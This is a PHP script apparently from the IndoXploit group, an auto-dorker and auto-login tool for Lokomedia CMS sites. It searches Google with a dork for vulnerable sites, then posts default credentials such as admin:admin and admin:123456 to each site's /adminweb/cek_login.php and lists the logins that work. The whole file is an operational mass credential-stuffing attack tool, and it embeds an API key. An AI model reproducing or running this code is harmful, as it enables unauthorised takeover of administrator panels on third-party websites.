Lokomedia Hunter[Auto Dorker+Auto Login]

<html>
<form method="post">
Dork: <input type="text" name="dork" value="inurl:/semua-berita.html" size="50" height="10">
<input type="submit" value="scan">
</form>
</html>
<?php
// IndoXploit
// Mr. Error 404 - shor7cut - tu5b0l3d - UstadCage_48 - sohai sec7or - cyber_taregh - ./MrJ - Mr. Xenophobic - bunglon_ijo - k3c0t - jackwild3r - wisnu404 - magelang6etar - Falcon-G21 - Rieqyns13
class indoxploit {
    public $dork;
    public function google($dork, $page) {
        $kunAPI = "AIzaSyDYG1FME1N7meBZLcywY7VojMHmtUAUIzY";
        $dork = urlencode($dork);
        $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz=8&q={$dork}&key=$kunAPI&start={$page}";
        $output = json_decode($this->http_getx($url, true), true);
        if($output) {
            return $output;
        } else {
            return false;
        }
    }
    public function http_getx($url, $safemode = false) {
        if($safemode === true) sleep(1);
        $im = curl_init($url);
        curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($im, CURLOPT_HEADER, 0);
        return curl_exec($im);
        curl_close();
    }
    public function buffer() {
        ob_flush();
        flush();
    }
    public function exploit($url,$payload) {
        $ch = curl_init($url);
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
          curl_setopt($ch, CURLOPT_POST, true);
          curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
          curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
          curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
          curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
        $res = curl_exec($ch);
          curl_close($ch);
        return $res;
    }
}
$dorker = new indoxploit;
$dork = $dorker->dork = $_POST['dork'];
if(isset($dork)) {
    $data = $dorker->google($dork, "0");
    $dorker->buffer();
    if($data) {
        foreach($data['responseData']['cursor']['pages'] as $key => $data_page) {
            $data = $dorker->google($dork, $data_page['start']);
            foreach($data['responseData']['results'] as $key => $load_data) {
                if($_SESSION[$load_data['visibleUrl']]) {
                } else {
                    $_SESSION[$load_data['visibleUrl']] = "1";
                    $url = "http://".$load_data['visibleUrl']."/";
                    $up = array(
                        "admin" => "admin",
                        "indoxploit" => "indoxploit",
                        "admin" => "123456",
                        "admin" => "admin123456",
                        "admin" => "tolol",
                        "admin" => "administrator",
                        );
                    foreach($up as $user => $pass) {
                        if($_SESSION[$user] && $_SESSION[$pass]) {
                        } else {
                            $_SESSION[$user] = "1";
                            $_SESSION[$pass] = "1";
                            $data = array(
                                "username" => $user,
                                "password" => $pass,
                                "Submt" => "Submit",
                                );
                            $anu = $dorker->exploit($url.'/adminweb/cek_login.php', $data);
                            if(preg_match("/Logout|Selamat Datang di Halaman Administrator/i", $anu)) {
                                echo "<a href='$url/adminweb/' target='_blank'>$url</a> -> sukses login [$user:$pass]<br>";
                            } else {
                                echo "$url -> gagal login.<br>";
                            }
                        }
                    $dorker->buffer();
                    }
                }
            }
        }
    $dorker->buffer();
    } else {
        echo "google captcha.";
    }
}